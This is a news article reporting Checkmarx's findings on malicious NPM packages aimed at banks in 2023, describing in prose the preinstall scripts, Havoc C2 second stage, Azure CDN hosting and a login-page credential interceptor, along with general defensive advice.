Leading application security provider Checkmarx recently released a report outlining the first instances of open-source software (OSS) attacks against the banking industry. These attacks, detected by Checkmarx’s supply chain research team, employ advanced techniques to exploit legitimate services offered by banks.
During the first half of 2023, numerous attacks were discovered. They involved attaching malicious functionalities to specific components of the targeted banks’ web assets. To deceive their victims, the attackers took advantage of fake LinkedIn profiles and employed customized command and control (C2) centers.
Though Checkmarx has successfully reported and removed the malicious open-source packages, the company warns of a persistent trend of attacks targeting the banking sector’s supply chain.
The first attack detailed by Checkmarx occurred in early April, wherein the threat actor used the NPM platform to upload packages with preinstall scripts that executed their objective upon installation. The attacker also created a fake LinkedIn profile, posing as an employee of the targeted bank, to appear more credible. Interestingly, the bank was unaware of the LinkedIn activity and had not commissioned any legitimate penetration testing services.
The attack followed a multi-stage approach, starting with running a script to identify the victim’s operating system. Once the operating system was determined, the script decoded relevant encrypted files in the NPM package, subsequently downloading a second-stage payload. To maintain a covert presence on Linux systems, the Linux-specific encrypted file was not initially flagged as malicious by online virus scanner VirusTotal.
Using Azure’s CDN subdomains and bypassing traditional deny list methods, the threat actor selected a subdomain on Azure that incorporated the targeted bank’s name, adding a layer of credibility. The attacker utilized the Havoc Framework as the second stage, an advanced post-exploitation C2 framework that evades standard defenses, like Windows Defender. This toolset provides attackers with the flexibility to modify their strategy to overcome different challenges in the victim’s environment.
Another incident, unrelated to the first, occurred in February at a separate bank. Here, threat actors uploaded a package to the NPM registry containing malicious code designed to blend into the victim bank’s website and lay dormant until triggered. The attacker targeted a unique element ID in the HTML of the login page, intercepting and transmitting data to a remote location.
Given the evolving nature of modern threats, the traditional vulnerability scanning approach at the build level is no longer sufficient. To mitigate future attacks, businesses are advised to proactively secure every stage of the software development lifecycle.
Checkmarx’s research team has been actively monitoring OSS attacks for some time. They previously alerted the industry to attacks on the PyPI repository and recently observed additional attacks on the NPM registry, leading to sporadic denial of service.
Going forward, it is essential for organizations to remain vigilant, evolve their defenses, and stay ahead of threat actors. Checkmarx’s supply chain research team is diligently tracking these attacks and will provide updates on any further developments.